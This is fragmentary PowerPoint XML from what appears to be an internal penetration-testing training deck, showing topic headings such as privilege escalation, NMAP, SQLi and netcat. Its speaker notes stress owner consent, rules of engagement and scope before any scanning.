        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="3156154"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Privilege Escalation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="3156154"/>
        <a:ext cx="5939507" cy="840588"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4206889"/>
          <a:ext cx="6910387" cy="840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464312-F93C-4C32-B8B0-B01AA79186B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="254278" y="4396022"/>
          <a:ext cx="462323" cy="4623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CC89B4-6830-4A0A-A6EA-1A723B2B473D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="970879" y="4206889"/>
          <a:ext cx="5939507" cy="840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62" tIns="88962" rIns="88962" bIns="88962" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" strike="sngStrike" kern="1200"/>
            <a:t>Pillaging and Post Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="970879" y="4206889"/>
        <a:ext cx="5939507" cy="8405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NMAP</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Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="120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tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="119588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SUDOER</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SUID bit</a:t>
          </a:r>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Path Jacking</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="11958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NMAP</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Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="120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tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="11958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NMAP</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Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="120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tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="11958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NMAP</a:t>
          </a:r>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Dirbuster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="120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tcpdump</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="11958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4538-930C-4B90-853C-9DE8966AF518}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="8"/>
          <a:ext cx="3372529" cy="1195889"/>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4846B682-492F-4273-A279-1BC785500E9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="361756" y="269586"/>
          <a:ext cx="657739" cy="6577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C498E-686D-459A-BF14-9E6D4B4C2473}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1381252" y="511"/>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err="1"/>
            <a:t>netcat</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="511"/>
        <a:ext cx="1991276" cy="1195889"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8B83981E-1D89-4D41-BBF2-B6D291DE37BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1495372"/>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AB5C7-6CAE-4443-89B6-D910B6DC4985}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="361756" y="1764447"/>
          <a:ext cx="657739" cy="657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88182-2743-48F1-84AC-679408B63A35}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1381252" y="1495372"/>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dirty="0" err="1"/>
            <a:t>SQLi</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="1495372"/>
        <a:ext cx="1991276" cy="1195889"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C5D14A8-7048-1745-9EE4-81AF66224CB5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2990234"/>
          <a:ext cx="3372529" cy="11958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9B8F8D-3A6D-144E-A642-FC001EB27691}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="361756" y="3259309"/>
          <a:ext cx="657739" cy="657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063E43-FFC3-1745-B778-1CAE09D84993}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1381252" y="2990234"/>
          <a:ext cx="1991276" cy="1195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65" tIns="126565" rIns="126565" bIns="126565" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="1111250">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200"/>
            <a:t>Password Cracking</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1381252" y="2990234"/>
        <a:ext cx="1991276" cy="119588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8A2CF-1390-A04A-A676-C803B10A3FDD}"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3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3602868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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3909768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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2552287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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2849144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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1313301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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1354831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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721587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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1096411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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3168922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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414931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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906400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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246131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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2836607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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3296249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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129334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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173020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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58599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idea to start actually using SQL MAP on the target during these next few slides.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D1C3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3896068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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1635820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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4091366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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3906384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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="678813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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41744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Scan Unknown IP Addresses: If you do not have consent from the owner, you shouldn’t do it. At work, if it’s a Starbucks server, the same applies. Scans can cause network issues, flooding it with traffic. It will also trigger alerts in our CSOC, and we don’t want to be wasting their time chasing down non-malicious activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration testers need two important things before they can start, those are: Rules of Engagement and Scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impact the network:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of these tools generate a lot of traffic. A lot of the types of traffic it generates has “signatures” that our Blue-Team (CSOC) are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>looking for.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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304362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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2866687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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042687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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374462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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2481362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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3620859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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1967230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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="757609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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8453876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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3605711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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3531683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Scan Unknown IP Addresses: If you do not have consent from the owner, you shouldn’t do it. At work, if it’s a Starbucks server, the same applies. Scans can cause network issues, flooding it with traffic. It will also trigger alerts in our CSOC, and we don’t want to be wasting their time chasing down non-malicious activity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration testers need two important things before they can start, those are: Rules of Engagement and Scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2924300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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933959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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2932703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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="643753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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9766121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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1036328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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7077125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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="625616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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4193160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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3865032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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2700831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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1719395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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17226100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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32647903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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42023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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2332435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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27076044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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2278830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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9467148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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26882121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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22166747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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1261155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C3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
